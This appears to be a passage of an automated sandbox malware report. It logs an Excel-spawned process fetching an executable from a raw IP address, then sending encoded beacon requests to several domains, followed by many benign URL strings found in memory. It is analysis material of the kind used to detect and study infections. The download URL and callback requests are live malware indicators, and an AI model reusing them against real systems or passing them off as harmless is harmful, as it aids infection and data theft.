00 00 00 00 00 48 00 00 00 02 00 05 00 20 34 0a 00 28 d0 03 00 03 00 00 00 42 00 00 06 38 52 04 00 e8 e1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 41 1c 87 bd ac 04 65 6d 61 1a 99 ca f0 1d 0f da 48 e7 40 a0 df 6b 0d 26 58 55 c0 d2 55 96 02 08 67 e5 f9 dc 7f ed 8b af fb ec fe bf de f3 9f 11 8b ee 98 df 7c be 17 20 e7 cd ae fc 30 59 c8 bb cf d9 42 f1 1a 93 c4 67 3b c7 3d 99 90 d1 f0 79 be c1 23 df b5 62 7f ed 13 c7 ac 4a 9b ec 75 1a 38 9d 8f f6 8d 78 70 38 67 3d cb cb ca 1f af 1b c5 55 ee 2a 9b 41 cc f8 01 2f 6f 29 92 84 02 e8 8e f1 38 e9 e8 d7 39 7b 8d b2 61 89 d0 94 e7 3b 40 55 f5 31 93 82 4d 90 b5 20 3c 85 9d eb 2a 9f 90 74 94 29 df 08 81 82 99 52 47 f0 e2 ad 00 4f f6 ba bc 63 44 41 b2 e0 91 08 6c 02 c9 14 46 44 4e 1c 4a 70 73 eb 81 e8 3a 86 cd 64 46 9d 4b 50 24 9d 9d 71 db 32 07 4b 14 bc e9 b6 32 07 96 3d ae e7 c0 e0 2a 7c 2f b7 17 b2 16 af cd a6 9d 63 26 c1 4b a0 d8 5b e7 d0 e4 e2 bf 29 1c c4 9f 34 06 9c 1a a4 64 8d 55 a1 8f b8 3b 72 bf 60 a3 02 5d 92 e1 e2 8f 0e 98 7d da f7 de 35 16 f8 6b a3 64 34 33 fd 15 32 4c
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.kolamart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=92sn3P3pA19WcJiefsZEcwqQjW3QIGzSMGjo0scjbpzKmVTSJHG7E3+45hmGj5CVb2tavg==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.mgg360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.rizrvd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=kkzs7wdh+d5Am/pShfiLHnYXY/z1ZZpbk/YksZMR2IH2vaFa+RYbCDDaBA0EFHNpIzx4Vw==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.activagebenefits.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.usmedicarenow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=fbWA8CenQ3TkeqVhPkQUacOFLjWRhlcbsLRP5XQKQo+1RaQPyvftJQY27dLrrakP9R1/fg==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.ismaelworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.152.187.17 66.152.187.17
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /wows/hm2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.194.54.219Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: unknownTCP traffic detected without corresponding DNS query: 18.194.54.219
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32ED815C.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /wows/hm2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.194.54.219Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.kolamart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=92sn3P3pA19WcJiefsZEcwqQjW3QIGzSMGjo0scjbpzKmVTSJHG7E3+45hmGj5CVb2tavg==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.mgg360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.rizrvd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=kkzs7wdh+d5Am/pShfiLHnYXY/z1ZZpbk/YksZMR2IH2vaFa+RYbCDDaBA0EFHNpIzx4Vw==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.activagebenefits.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.usmedicarenow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?OxlhlP1x=fbWA8CenQ3TkeqVhPkQUacOFLjWRhlcbsLRP5XQKQo+1RaQPyvftJQY27dLrrakP9R1/fg==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1Host: www.ismaelworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.kolamart.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Jan 2021 19:04:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a
          Source: explorer.exe, 00000006.00000000.2178834889.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2178834889.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2167227314.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2166745139.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2166745139.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000000.2161587141.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2157265721.000000000235A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
